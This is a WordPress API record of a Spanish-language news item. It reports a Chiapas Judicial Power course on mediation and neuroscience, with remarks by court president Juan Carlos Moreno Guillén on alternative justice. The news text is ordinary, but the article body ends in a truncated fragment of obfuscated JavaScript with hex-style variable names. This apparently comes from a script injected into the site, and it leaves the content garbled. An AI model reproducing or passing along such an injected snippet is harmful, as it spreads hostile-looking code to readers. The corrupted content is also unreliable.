{"id":22512,"date":"2025-06-19T05:19:31","date_gmt":"2025-06-19T05:19:31","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22512"},"modified":"2025-06-19T05:19:32","modified_gmt":"2025-06-19T05:19:32","slug":"juan-carlos-moreno-guillen-impulsa-la-justicia-alternativa-y-los-masc-en-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22512","title":{"rendered":"Juan Carlos Moreno Guill\u00e9n impulsa la Justicia Alternativa y los MASC en Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"22513\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000177680-1024x682.jpg\" alt=\"\" class=\"wp-image-22513\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000177680-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000177680-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000177680-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000177680-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000177680.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"609\" data-id=\"22516\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000177678-1024x609.jpg\" alt=\"\" class=\"wp-image-22516\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000177678-1024x609.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000177678-300x178.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000177678-768x457.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000177678.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"22514\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000177682-1024x682.jpg\" alt=\"\" class=\"wp-image-22514\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000177682-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000177682-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000177682-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000177682-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000177682.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"22515\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000177676-1024x682.jpg\" alt=\"\" class=\"wp-image-22515\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000177676-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000177676-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000177676-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000177676-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000177676.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>18 de junio del 2025. El Poder Judicial del Estado de Chiapas realiz\u00f3 el curso denominado: &#8220;Mediaci\u00f3n y Neurociencia: Estrategias Avanzadas para Mediadores&#8221; impartido por la especialista espa\u00f1ola Mari Luz S\u00e1nchez Garc\u00eda \u2013 Arista, el cual estuvo dirigido a integrantes del Centro Estatal de Justicia Alternativa (CEJA).<\/p>\n\n\n\n<p>En el marco de este curso, el magistrado presidente del Tribunal Superior de Justicia, Juan Carlos Moreno Guill\u00e9n, destac\u00f3 los beneficios de la Justicia Alternativa y de los Mecanismos Alternativos de Soluci\u00f3n de Controversias (MASC), para fortalecer una cultura de paz en Chiapas.<\/p>\n\n\n\n<p>De igual manera, al hacer entrega de un reconocimiento a Mari Luz S\u00e1nchez, Moreno Guill\u00e9n subray\u00f3 la importancia de estas capacitaciones con las que se fortalece la visi\u00f3n humanista de la justicia.<\/p>\n\n\n\n<p>Con estas acciones, el Poder Judicial reafirma su compromiso con la capacitaci\u00f3n de las y los servidores estatales, con la que se abona a la impartici\u00f3n de una justicia m\u00e1s humana, accesible e incluyente.<\/p>\n\n\n\n<p>Estuvieron presentes en esta actividad la directora general del CEJA, Elisheba Goldhaber Pasillas, y el director del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial, Jos\u00e9 Luis Baltazar Arg\u00fcello.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 18 de junio del 2025. El Poder Judicial del Estado de Chiapas realiz\u00f3 el curso denominado: &#8220;Mediaci\u00f3n y Neurociencia: Estrategias Avanzadas para Mediadores&#8221; impartido por la especialista espa\u00f1ola Mari Luz S\u00e1nchez Garc\u00eda \u2013 Arista, el cual estuvo dirigido a integrantes del Centro Estatal de Justicia Alternativa (CEJA). En el marco de este curso, el &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22515,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-22512","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22512","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22512"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22512\/revisions"}],"predecessor-version":[{"id":22517,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22512\/revisions\/22517"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22515"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22512"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22512"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22512"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}